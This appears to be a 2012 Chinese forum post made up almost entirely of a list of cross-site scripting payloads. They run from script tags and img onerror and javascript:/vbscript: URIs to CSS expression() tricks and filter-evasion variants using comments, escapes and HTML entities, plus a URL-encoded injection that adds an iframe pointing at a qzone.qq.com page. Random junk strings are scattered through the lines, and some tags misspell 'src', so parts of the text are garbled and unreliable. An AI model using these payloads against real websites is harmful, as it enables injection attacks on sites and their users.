<script>alert("跨站")</script> (最常用)
& I/ h; }" h7 R& l" f% t<img scr=javascript:alert("跨站")></img>+ a' ^5 P7 g: g* \: w, m
<img scr="javascript: alert(/跨站/)></img>
o* l' z/ y# P \- l<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)/ x/ @0 r. ?2 p( h
<img scr="#" onerror=alert(/跨站/)></img>
9 M N$ V9 {- C% a; I. p<img scr="#" style="xss:expression(alert(/xss/));"></img>
; T9 s7 Z7 _; Q+ z<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
4 b! y8 K. q/ i: c) L$ X<img src=vbscript:msgbox ("xss")></img>+ x5 |6 p2 p) y% h7 N) V
<style> input {left:expression (alert('xss'))}</style>
' ]# x4 ~1 M& e* N4 m1 t" O<div style={left:expression (alert('xss'))}></div>* B5 X$ O5 f/ U) w
<div style={left:exp/* */ression (alert('xss'))}></div>9 V, t+ i/ ]; g# c8 E4 t+ Y$ g
<div style={left:\0065\0078ression (alert('xss'))}></div>
9 _9 B9 Q( C$ Y3 s' ihtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 }4 s, ]: K9 Y* }$ |5 X4 l
unicode <div style="{left:expRessioN (alert('xss'))}">4 s$ S# H* z% y! X7 V8 r' N) _
- P# `0 C$ k% n. r1 s$ v: ]. k"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
$ T4 R2 v3 W+ K# n- c* l |
发表于 2012-9-13 17:15:04
收藏
分享
支持
反对